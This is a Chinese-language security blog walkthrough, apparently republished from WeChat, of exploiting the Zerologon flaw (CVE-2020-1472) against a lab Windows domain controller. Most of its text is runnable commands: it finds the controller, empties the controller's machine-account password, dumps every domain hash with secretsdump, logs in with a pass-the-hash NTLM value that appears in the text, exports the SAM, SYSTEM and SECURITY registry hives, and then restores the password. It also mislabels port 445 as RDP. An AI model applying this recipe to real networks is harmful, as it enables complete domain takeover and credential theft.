本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
域控(Win2008):192.168.199.131
域用户(Win7):192.168.199.128
域用户(Win03):192.168.199.129
漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472
利用 + 重置工具:https://github.com/risksense/zerologon
重置 hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472
工具运行环境:https://github.com/SecureAuthCorp/impacket
1、假设已经渗透到内网
2、常见查找域的方法
(1)可以通过扫描是否开放端口:53(dns)、389(ldap)、445(rdp)
(2)通过 nbtstat 命令
Usage:nbtstat -A 当前 IP
Usage:ping 域. com
(3)查看 systeminfo
Usage:systeminfo
(4)查看主机 dns
Usage:nslookup
(5)查看当前登录域
Usage:net config workstation
3、用拉登的 cs 插件扫描 ldap
Usage:Ladon.exe 域地址 LdapScan
Example:Ladon.exe 192.168.199.1/24 LdapScan
(图中 IS_LDAP 提示 192.168.199.131 是域控)
3、确定域后确定域主机名
Usage:Ladon.exe 域地址 OsScan
Example:Ladon.exe 192.168.199.131 OsScan
HKServer.com\YUKONG(HKServer 是,YUKONG 是域主机名)
4、用验证脚本测试是否存在(测试存在)
Usage:python3 zerologon_tester.py 域主机名域地址
Example:python3 zerologon_tester.py YUKONG 192.168.199.131
5、再用 set_empty_pw 脚本测试
Usage: set_empty_pw.py
Example:python3 set_empty_pw.py YUKONG 192.168.199.131
大概利用方法就是把域用户密码清空,用空密码连上去 dump 管理员的 hash
6、利用 secretsdump 脚本 dump 用户 hash
Usage:python3 secretsdump.py "域 / 主机名 $"@域地址 - just-dc -no-pass
Example:
python3 secretsdump.py "HKServer/YUKONG$"@192.168.199.131
-just-dc -no-pass
执行 dump 可以看到 YUKONG$ 用户的密码已经被重置成空密码,31d6cfe......
因为把域密码重置为空,所以 - no-pass 就行了,在用户过多的情况下可以单独 dump administrator 的 hash
命令改成:-just-dc-user "administrator" 就 ok,见下图
7、利用 wmiexec 脚本横向连接(连接后恢复原始 hash)
Usage:
python3 wmiexec.py 域 / administrator@ 域地址 - hashes
aad3b435b51404eeaad3b435b51404ee:3766c17d09689c438a072a3327
0cb6f5
Example:
python3 wmiexec.py HKServer/[email protected] -hashes
aad3b435b51404eeaad3b435b51404ee:3766c17d09689c438a072a3327
0cb6f5
已经连上来了,可以上 cs,或者加管理员登录上去看都行,主要是恢复密码
先备份注册表(依次命令一遍):
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
(save 后缀的文件会下载到你 wmiexec 脚本的同目录)
8、再用 secretsdump 脚本获取原始 hash
直接退出来命令:
python3 secretsdump.py -sam sam.save -system system.save -security
security.save LOCAL
9、最后用 reinstall_original_pw 脚本恢复
Usage:python3 reinstall_original_pw.py 主机名域地址 hash
Example:
python3 reinstall_original_pw.py YUKONG 192.168.199.131
30f90a3bfe2f085a880dcf954a8825f4
10、可能会出现没有 hash 的情况,可以用 restorepassword 脚本恢复 hexpass
取第 8 步中 plan_password_hex 字段
Usage:python3 restorepassword.py DC@DC -target-ip 域地址 - hexpass
值
Example :python3 restorepassword.py YUKONG@YUKONG -target-ip
192.168.199.131 -hexpass
8dac4a096eec66839507b9018ace3e1ac2e27e4e81455eda7ee9e49d86a
2c57619740204e76571e512144a72c67d01e21a7d6b0c13ed4cebc97442
e1f9e75b6943c8fe4a67c0c8c6dfd0046624dd174b2dba468df3303a54a4
1be3f415f19f7cf25ae6f730cda6d125e5ebf480161b3bd9d4da2dca2f215f
01ba6b26603b8e36fd3bd86c3cb9ebba159da747df883125e6d00cbe105
c270c866d904b166bf6356f45572df5ed37976561da201e954074484b2d
b4462ae6c3d35fc0350feab07ea8868952fd8e84d9d5b66df6542e0f41a1e
283bb09c6cebfb2bb41fdc2b4d0a1ef8f5b2a94b2c3741c79f05c4edca170
假装有图
11、用第 7 步看看是不是真的恢复了
恢复后连接 3389 即可
扫描下方二维码加小秘书微信,发送”安全“加入粉丝群。
------------------------------------
关注玄魂工作室--精彩不断
如果喜欢本文
欢迎 在看丨留言丨分享至朋友圈 三连